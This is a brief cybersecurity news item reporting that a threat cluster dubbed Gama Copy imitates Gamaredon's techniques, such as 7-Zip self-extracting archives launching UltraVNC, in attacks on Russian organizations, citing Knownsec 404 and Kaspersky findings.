Threat Intelligence, Malware

Attacks by Gamaredon copycat target Russia

Plain code with the word "cyberattack" in red.

Organizations across Russia have been targeted by the newly emergent Gama Copy threat cluster, which leverages Russian state-backed hacking operation Gamaredon's tools, in new attacks aimed at spreading UltraVNC for remote compromise, The Hacker News reports.

Intrusions by Gama Copy also closely resembled those of the advanced persistent threat operation Core Werewolf, also known as PseudoGamaredon and Awaken Likho, with both groups' utilization of 7-ZIP self-extracting archive files for UltraVNC execution, port 443 for server connections, and the EnableDelayedExpansion command, an analysis from the Knownsec 404 Advanced Threat Intelligence team revealed. "Since its exposure, [Gama Copy] has frequently mimicked the TTPs used by the Gamaredon organization and cleverly used open-source tools as a shield to achieve its own goals while confusing the public," said Knownsec 404. Such a development follows a Kaspersky report detailing Core Werewolf spear-phishing attacks against Russian entities that tapped 7z SFX for MeshCentral platform deployment.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

You can skip this ad in 5 seconds